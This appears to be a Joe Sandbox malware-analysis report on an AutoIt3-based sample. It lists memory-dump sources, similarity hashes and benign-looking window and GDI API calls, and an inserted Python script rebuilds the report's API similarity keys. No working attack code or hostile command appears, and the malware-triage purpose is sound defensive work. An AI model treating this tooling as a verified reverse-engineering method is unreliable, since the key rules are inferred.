                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7184279784806f06c67ea01a1fc258e16321b5f7fa322a5c13a0a85e70551294
                                                                                      • Instruction ID: e44d7eefcba407515c2434a493a258d1f61a5c3d9e2f578758de0499de92dbc4
                                                                                      • Opcode Fuzzy Hash: 7184279784806f06c67ea01a1fc258e16321b5f7fa322a5c13a0a85e70551294
                                                                                      • Instruction Fuzzy Hash: 2422F470A04609DFDF04CF65D891AEEB3F5FF45300F204229E816A72A1EB359E95EB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6eeea7111f3793c54db2642996c1dbbb3823111ab7ee3a6387ea8d291e4887d7
                                                                                      • Instruction ID: 05a39719ba85eb05b98ed9cbcb165f4f2bc05c520f3a78dcd83d55e0ccdc46a1
                                                                                      • Opcode Fuzzy Hash: 6eeea7111f3793c54db2642996c1dbbb3823111ab7ee3a6387ea8d291e4887d7
                                                                                      • Instruction Fuzzy Hash: 5102E7B5E00209EBDB04DF64D881AAEB7B5FF44300F118169E816DB290EB31EF95DB95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: 43338182a2d6a5f3ff183443a6a9bd893b949779adc219cc9a276c837356eab1
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: BC9179721280A34EDB6A463E857407EFFE15A523A1B1E079DDCF2CA1C5FE14CA54D620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: a9b82f9d75931e5631de39726bbb90f50f40b317f2a3a9231650aeba284e67ad
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: 129187722190E34EDB2D427A857403DFFE15A923A6B1E079DD8F2CA1C1FD14C764E620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e0e6c0761db7c23f07272b0b7a30dd4369b62ae0542d33859df5373bfe1e60d
                                                                                      • Instruction ID: 643904d3a0b8dded7f6f7d9b4c675b06ab938f8e7f3d3393e007c86f766faf78
                                                                                      • Opcode Fuzzy Hash: 3e0e6c0761db7c23f07272b0b7a30dd4369b62ae0542d33859df5373bfe1e60d
                                                                                      • Instruction Fuzzy Hash: 88618AF1238309A7DE349A2C8CA5BBEB3A4DF41708F101B1AF853DB281D6119F46E755
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f00483d1692421cf4d7de9aaa8fe928b5afb94107b427faf4014b85e0458c3f8
                                                                                      • Instruction ID: 20783a467cc73c73d66115a0ac3fb730ac9ed82e1e303e1df077d8fc2d714c0e
                                                                                      • Opcode Fuzzy Hash: f00483d1692421cf4d7de9aaa8fe928b5afb94107b427faf4014b85e0458c3f8
                                                                                      • Instruction Fuzzy Hash: 57617AF12387096BDE389A288896BFF2398DF41700F100B59F863DB281DA129F469355
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: fdd2b72d5224a755e2735ab1c4006bdc2c01ad347278ae12fdfbef849f14083a
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: 988187336191A34DDB6D863A853453EFFE15A923A1B1E079DD8F2CB1C1EE24C754E620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5550a333b2ee5a4d0324193588281bbc428a8f87a40c879ae749dc54e17023df
                                                                                      • Instruction ID: 4896f08b01dbe2ad31923af2ea2efadf89ec975c4f780b72df6a0269d898cbea
                                                                                      • Opcode Fuzzy Hash: 5550a333b2ee5a4d0324193588281bbc428a8f87a40c879ae749dc54e17023df
                                                                                      • Instruction Fuzzy Hash: 7821E7326206118BDB28CF79C82377E73E9A794314F14862EE4A7C73D0DE75A904CB84
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00C92B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 00C92B43
                                                                                      • DestroyWindow.USER32 ref: 00C92B52
                                                                                      • GetDesktopWindow.USER32 ref: 00C92B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00C92B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C92CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C92CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00C92D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C92D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00C92D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00C92DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C92DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CAFC38,00000000), ref: 00C92DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C92DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C92E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C92E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C92E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C9303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 6d607390641683a0ce40343edc66ff78a358d93fc7321751818443f9a491bd32
                                                                                      • Instruction ID: 10dcbc83a2aa7fb9b659812adb289d66c99a7221f211a1db8fe5f5c058258945
                                                                                      • Opcode Fuzzy Hash: 6d607390641683a0ce40343edc66ff78a358d93fc7321751818443f9a491bd32
                                                                                      • Instruction Fuzzy Hash: 05027A71A00215AFDB14DFA4CC89FAE7BB9EB4A314F048158F915AB2A1DB74ED41CF60
                                                                                      APIs
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CA712F
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CA7160
                                                                                      • GetSysColor.USER32(0000000F), ref: 00CA716C
                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00CA7186
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA7195
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CA71C0
                                                                                      • GetSysColor.USER32(00000010), ref: 00CA71C8
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00CA71CF
                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00CA71DE
                                                                                      • DeleteObject.GDI32(00000000), ref: 00CA71E5
                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00CA7230
                                                                                      • FillRect.USER32(?,?,?), ref: 00CA7262
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA7284
                                                                                        • Part of subcall function 00CA73E8: GetSysColor.USER32(00000012), ref: 00CA7421
                                                                                        • Part of subcall function 00CA73E8: SetTextColor.GDI32(?,?), ref: 00CA7425
                                                                                        • Part of subcall function 00CA73E8: GetSysColorBrush.USER32(0000000F), ref: 00CA743B
                                                                                        • Part of subcall function 00CA73E8: GetSysColor.USER32(0000000F), ref: 00CA7446
                                                                                        • Part of subcall function 00CA73E8: GetSysColor.USER32(00000011), ref: 00CA7463
                                                                                        • Part of subcall function 00CA73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CA7471
                                                                                        • Part of subcall function 00CA73E8: SelectObject.GDI32(?,00000000), ref: 00CA7482
                                                                                        • Part of subcall function 00CA73E8: SetBkColor.GDI32(?,00000000), ref: 00CA748B
                                                                                        • Part of subcall function 00CA73E8: SelectObject.GDI32(?,?), ref: 00CA7498
                                                                                        • Part of subcall function 00CA73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00CA74B7
                                                                                        • Part of subcall function 00CA73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CA74CE
                                                                                        • Part of subcall function 00CA73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00CA74DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                      • String ID:
                                                                                      • API String ID: 4124339563-0
                                                                                      • Opcode ID: 7f47b2f69440e6dea24308d6ebe3dd9b5e72d7a1827e6ff11cb06f2fae33275b
                                                                                      • Instruction ID: 1825546b286a3a670e1151d135764433183956d729aa00566dcbe3a44da242f0
                                                                                      • Opcode Fuzzy Hash: 7f47b2f69440e6dea24308d6ebe3dd9b5e72d7a1827e6ff11cb06f2fae33275b
                                                                                      • Instruction Fuzzy Hash: 70A18D72508302AFDB119F60DC88B6F7BE9FB4A328F100B19FA62971A1D771E9449B51
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00C28E14
                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C66AC5
                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C66AFE
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C66F43
                                                                                        • Part of subcall function 00C28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C28BE8,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28FC5
                                                                                      • SendMessageW.USER32(?,00001053), ref: 00C66F7F
                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C66F96
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C66FAC
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C66FB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                      • String ID: 0
                                                                                      • API String ID: 2760611726-4108050209
                                                                                      • Opcode ID: 18cfb282dc00eb57ac06d01982bc30b9e6b85a9065c0ee7caec26a0af51497c3
                                                                                      • Instruction ID: 423f5199a2726ac168f175ca6106aa1df45e47ac56e33e74fddcd6d1c7c6aab7
                                                                                      • Opcode Fuzzy Hash: 18cfb282dc00eb57ac06d01982bc30b9e6b85a9065c0ee7caec26a0af51497c3
                                                                                      • Instruction Fuzzy Hash: D612CB34201251EFDB25CF28D8C4BAAB7E1FB45300F184469F4A58B662CB32ED66DF91
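                                                                                      The "API ID" line in each Similarity block is a frequency-ordered token key built from the function's API names, which makes it usable for matching the same routine across reports (for example against a clean AutoIt3 interpreter, whose "AutoIt v3" window class and static/progress controls these functions belong to) even when load addresses differ. The script below is an added example and is not Joe Sandbox code. Its rules (CamelCase split, tokens shorter than four characters dropped, "Part of subcall function" lines counted, an underscore-terminated prefix such as ImageList_ kept as one token) are inferred from the three keys printed above and reproduce them exactly, but they are an assumption about the tool, not its documented algorithm; the numeric "API String ID" pair is not reproduced.

```python
"""Reconstruct the Joe Sandbox "API ID" similarity key from a function's API listing.

The rules below are inferred from the keys shown on this report page, not taken
from Joe Sandbox documentation (assumption): split each API name into CamelCase
tokens, drop tokens shorter than four characters (Get, Set, Sys, Ex, W, ...),
count each token over the whole listing including "Part of subcall function"
lines, group tokens by frequency from most to least frequent, sort alphabetically
inside a group, and join the groups with '$'.
"""
import re
from collections import Counter

# One API call line as printed in the report, optionally marked as a subcall.
_API_LINE = re.compile(
    r"•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Za-z0-9]+)"
)
_CAMEL = re.compile(r"[A-Z][a-z0-9]*")
MIN_TOKEN_LEN = 4  # assumption: shorter tokens never appear in the listed keys


def parse_api_calls(report_text):
    """Return [(api_name, module, is_subcall)] for every API line in the text."""
    calls = []
    for line in report_text.splitlines():
        m = _API_LINE.search(line)
        if m:
            calls.append((m.group(1), m.group(2), "Part of subcall" in line))
    return calls


def tokenize(api_name):
    """Split an API name into the tokens the key is built from.

    'GetWindowLongW' -> ['Window', 'Long']
    'ImageList_Remove' -> ['ImageList_', 'Remove']  (underscore prefix kept whole,
    as observed in the key of function 00C28E14 above)
    """
    segments = api_name.split("_")
    tokens = [seg + "_" for seg in segments[:-1]]  # e.g. 'ImageList_'
    tokens += _CAMEL.findall(segments[-1])          # CamelCase split of the rest
    return [t for t in tokens if len(t) >= MIN_TOKEN_LEN]


def api_id(api_names):
    """Build the '$'-separated key from a list of API names (duplicates count)."""
    counts = Counter(tok for name in api_names for tok in tokenize(name))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def api_id_from_report(report_text):
    """Parse a report API listing and return its reconstructed API ID."""
    return api_id([name for name, _, _ in parse_api_calls(report_text)])


# Constructed sample: the API listing of function 00C28E14 copied from this page.
SAMPLE_LISTING = """\
• DestroyWindow.USER32(?,?), ref: 00C28E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00C66AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C66AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C66F43
  • Part of subcall function 00C28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C28BE8,?,00000000,?,?,?,?,00C28BBA,00000000,?), ref: 00C28FC5
• SendMessageW.USER32(?,00001053), ref: 00C66F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C66F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00C66FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00C66FB7
"""

if __name__ == "__main__":
    # Expected to print the page's own key for this function:
    # DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
    print(api_id_from_report(SAMPLE_LISTING))
```

                                                                                      Paste any "APIs" block from a report into api_id_from_report to get a key that can be compared with the "API ID" of a function in another report; a key that matches one from an unmodified AutoIt3 interpreter marks runtime code that can be skipped in favour of the unpacked payload. Because short tokens are discarded, two functions can share a key while differing in Get/Set variants, so treat a match as a hint for manual diffing, not as proof of identity.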
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000), ref: 00C9273E
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C9286A
                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C928A9
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C928B9
                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C92900
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00C9290C
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C92955
                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C92964
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C92974
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00C92978
                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C92988
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C92991
                                                                                      • DeleteDC.GDI32(00000000), ref: 00C9299A
                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C929C6
                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C929DD
                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C92A1D
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C92A31
                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C92A42
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C92A77
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C92A82
                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C92A8D
                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C92A97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                      • API String ID: 2910397461-517079104
                                                                                      • Opcode ID: d9fe5674911840252d6cf6cc3ec526857399f12511b5f1b30713aa76edd1fa8d
                                                                                      • Instruction ID: 14286c5f5c91f5e0945c844052df509b28b25d93db7abdbd4c14f05409be830b
                                                                                      • Opcode Fuzzy Hash: d9fe5674911840252d6cf6cc3ec526857399f12511b5f1b30713aa76edd1fa8d
                                                                                      • Instruction Fuzzy Hash: 24B14B71A00215BFEB14DFA8DC89FAE7BB9EB09714F044114FA15EB2A0D774AD40DBA4
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C84AED
                                                                                      • GetDriveTypeW.KERNEL32(?,00CACB68,?,\\.\,00CACC08), ref: 00C84BCA
                                                                                      • SetErrorMode.KERNEL32(00000000,00CACB68,?,\\.\,00CACC08), ref: 00C84D36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
